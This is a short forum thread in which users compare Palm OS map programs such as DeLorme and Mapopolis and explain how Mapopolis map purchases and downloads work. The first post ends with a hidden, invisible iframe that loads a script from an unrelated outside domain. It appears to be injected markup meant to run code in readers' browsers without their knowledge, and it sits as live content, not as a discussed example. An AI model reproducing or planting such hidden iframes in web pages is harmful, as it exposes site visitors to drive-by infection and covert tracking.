Map programs

I have seen several different map programs for the Palm OS. Rand McNally and DeLorme are examples. Has another bought any of these and what are you opinions? Which is better?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I use Delorme. It is slow if you put maps on the card, and the auto-routing function is really slow, but it works.

I (and many others) use mapopolis (www.mapopolis.com). Excellent maps, and can provide door to door directions as well.

I am confised, how does it work exactly? Do I need to subscribe yearly? Or does that just get me updated maps? Hop large are the maps and do the work well with the SD card?

Send a message via ICQ to Michael Rye

Read the details at http://www.mapopolis.com. You can buy all the current maps on CD. Or you can pay a fee, and download as many maps as you need during a certain amount of time. That's the basics of it. There are more options and information at the site.
